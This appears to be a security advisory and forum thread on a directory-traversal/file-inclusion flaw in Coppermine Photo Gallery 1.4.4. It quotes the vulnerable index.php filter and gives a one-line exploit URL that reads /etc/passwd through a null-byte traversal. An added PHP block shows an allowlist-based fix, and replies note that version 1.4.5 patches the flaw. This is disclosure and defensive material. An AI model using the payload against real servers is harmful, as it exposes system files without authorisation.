Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.4.stable
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: High

-----------------Description---------------
There is a security flaw in Coppermine Photo Gallery, one of the popular photo galleries on the internet, that allows an attacker to perform a Remote File Inclusion attack. The bug is a security flaw in the plugin inclusion system. This system does not properly validate the parameter $_GET['file'] and has a simple mechanism for removing special characters that is easily evaded.

--------------See Also------------------
file:{index.php}39

$file = str_replace('//','',str_replace('..','',$_GET['file']));
$path = './plugins/'.$file.'.php';
// Don't include the codebase and credits files
if ($file != 'codebase' && $file != 'configuration' && file_exists($path)) {
    // Include the code from the plugin
    include_once($path);
    $file = true;
}

--------------Exploit----------------------
/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00

--------------Credit-----------------------
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security
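The filter quoted in the advisory above, set beside an allowlist-plus-containment check, as an added example that is not part of the original post and not Coppermine's own code or its 1.4.5 fix. `legacy_filter()`, `resolve_plugin()`, the identifier-only naming rule and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added illustration; not Coppermine's code. legacy_filter() wraps the line
// quoted from index.php; resolve_plugin() and the demo paths are hypothetical.

function legacy_filter(string $file): string
{
    // Two independent single-pass deletions, exactly as in the advisory.
    return str_replace('//', '', str_replace('..', '', $file));
}

function resolve_plugin(string $file, string $pluginDir): ?string
{
    // Allowlist: assume plugin names are plain identifiers. This rejects
    // dots, slashes and NUL bytes instead of trying to strip them.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $file)) {
        return null;
    }
    // Same exclusions as the original check.
    if ($file === 'codebase' || $file === 'configuration') {
        return null;
    }
    $base = realpath($pluginDir);
    $path = realpath($pluginDir . DIRECTORY_SEPARATOR . $file . '.php');
    if ($base === false || $path === false) {
        return null; // directory or plugin file does not exist
    }
    // Containment check on the canonical path (covers symlinks).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a temporary plugin directory with one plugin.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'plugins_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'sample.php', "<?php\n");

// Constructed input: the inner pass finds no '..', then deleting '//'
// joins the two dots, so the "cleaned" value contains a traversal sequence.
$cleaned = legacy_filter('.//./x');
var_dump(strpos($cleaned, '..') !== false);
var_dump(resolve_plugin('.//./x', $dir));
var_dump(resolve_plugin("sample\0", $dir));
var_dump(resolve_plugin('sample', $dir));

unlink($dir . DIRECTORY_SEPARATOR . 'sample.php');
rmdir($dir);
```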
stuart pls bump, thank you
1.4.5 is out to fix this directory traversal attack
in CVS